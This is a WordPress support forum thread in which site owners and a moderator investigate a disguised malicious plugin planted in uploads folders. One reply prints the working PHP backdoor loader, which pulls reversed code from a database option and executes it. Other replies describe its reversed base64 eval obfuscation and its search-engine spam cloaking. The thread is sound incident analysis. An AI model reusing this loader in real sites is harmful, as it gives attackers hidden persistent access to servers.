Hacker uploading malicious plugin to uploads folder

  • Puck

    (@puck)


    16 years, 10 months ago

    I’ve seen things like this a bit lately on a few of our WordPress installs:
    The plugin ../../../.../wp-content/uploads/2009/06/wp-cache.old has been deactivated due to an error: Invalid plugin path.

    At first I thought it was just a glitch, but today I checked out the file itself and found that it’s a plugin file contained encoded text. It claims to be a plugin called “HTML Code Filter”, though the actual body of the plugin is encoded somehow.

    I’ve zipped up one of these infections in the hopes someone more skilled can figure out what it’s doing and how it got there.

    You can download it at http://www.alderac.com/wp-hack.zip

    I’ve changed my uploads folders to 775 (rather than 777) hoping this will stop the attack, but I don’t know enough about this to know for sure. Does anyone know how they could be uploading a file to my uploads (and sub-folders!) folder without admin access?

    We’re hosted on a dedicated linux server running Apache/Cpanel/WHM, PHP 5.2.9, Apache 2.2.11, mySQL 5.0.81.

    There are several different filenames of this attack, including wp-cache.old, wp-cache.cache, wp-cache.bak, wp-db-backup.cache, and one named after an image I had uploaded but with .jpg replaced with .cache

    I haven’t seen anything adverse from this yet, but I may have caught it early. Or it could be hidden and I haven’t found it yet.

Viewing 9 replies - 1 through 9 (of 9 total)
  • Thread Starter Puck

    (@puck)

    16 years, 10 months ago

    Oh, another question — even if a hacker could upload to the uploads folder through some security flaw, how is he activating that plugin so that WordPress has to deactivate it?!

    Moderator Samuel Wood (Otto)

    (@otto42)

    WordPress.org Admin

    16 years, 10 months ago

    He’s not, he got in through some other means.

    What you’re seeing is, essentially, the payload. That gets installed after a hack so as to leave him a later way in even if you remove the security hole initially, as you might miss the “hidden” plugin.

    Moderator Samuel Wood (Otto)

    (@otto42)

    WordPress.org Admin

    16 years, 10 months ago

    Here’s the resulting malicious code, BTW, after you take out all the fake comments:

    <?php
global $wpdb;
$trp_rss=$wpdb->get_var(
"SELECT option_value FROM $wpdb->options WHERE option_name='rss_f541b3abd05e7962fcab37737f40fad8'");
preg_match("!events or a cale\"\;s\:7\:\'(.*?)\'!is",$trp_rss,$trp_m);
$trp_f=create_function("",strrev($trp_m[1]));
$trp_f();
?>

    Basically, it’s retrieving some PHP code from your database and running it.

    I’d very much like to see what’s in the wp_options table with a key of “rss_f541b3abd05e7962fcab37737f40fad8” (that name is meaningless, it was chosen to make it look like any other rss feed).

    Thread Starter Puck

    (@puck)

    16 years, 10 months ago

    I’ve grabbed that and uploaded it to http://www.alderac.com/hack-database.txt

    It seems to have a lot of extra junk and then some more coded text.

    Thanks so much for looking into this.

    Thread Starter Puck

    (@puck)

    16 years, 10 months ago

    Ok, I’ve found some tools to decode the text, and while I’m no PHP expert it looks like they’re adding in a bunch of links to the page, but only when it’s being crawled by a bot like Google or Yahoo.

    I still have no idea how they got in. I’ve also found several additional admin users by using phpMyAdmin and checking out the wp_users table. I’ve removed them, but without knowing where my security hole is I fear they’ll just come back.

    Moderator Samuel Wood (Otto)

    (@otto42)

    WordPress.org Admin

    16 years, 10 months ago

    … Wow. Never seen this approach before:

    ..bunch of junk..J3byJXZ”(edoced_46esab(lave

    That’s an “eval(base64_decode(…)”… backwards. Clever.

    monkeyangst

    (@monkeyangst)

    16 years, 7 months ago

    I’m having the same problem. I logged into Technorati to see how it was seeing my blog, and was shocked to find lots of pharmaceutical spam in the content of both my WordPress blogs.

    When viewed through a browser, this spam is not present. However, when a search engine spiders the site, there it is.

    A lot of troubleshooting revealed that in my active_plugins option, there was one entry that pointed to something that wasn’t a plugin: a file called .akismet.old.php, which was stored in a location deep within my blog (different locations on each blog). This file turned out to be exactly what Otto mentions. I also found the same rss_f541b3abd05e7962fcab37737f40fad8 entry in my options table.

    What I, like Otto, still can’t figure out is:
    1) How that file came to exist
    2) How that option was written to my database
    3) Whether this can still happen with WordPress 2.8.4
    I’m also curious about
    4) How this content is displayed to search engines but not to browsers. This, however, is just curiosity. Doesn’t really affect the problem.

    Anyone have any clues as to how these people are getting in?

    monkeyangst

    (@monkeyangst)

    16 years, 7 months ago

    Sorry, I mean Puck rather than Otto…

    monkeyangst

    (@monkeyangst)

    16 years, 7 months ago

    Nevermind item 4) on my list… I fully decoded the PHP code of the malicious file and I now see that it simply checks the useragent and if it’s a bot, does an add_content action. Very simple. Not sure what the rest of the code does, as it’s lengthy and my PHP skills are intermediate at best. I can provide the code to anyone who wants it, though I’m loathe to post it publicly.

Viewing 9 replies - 1 through 9 (of 9 total)

The topic ‘Hacker uploading malicious plugin to uploads folder’ is closed to new replies.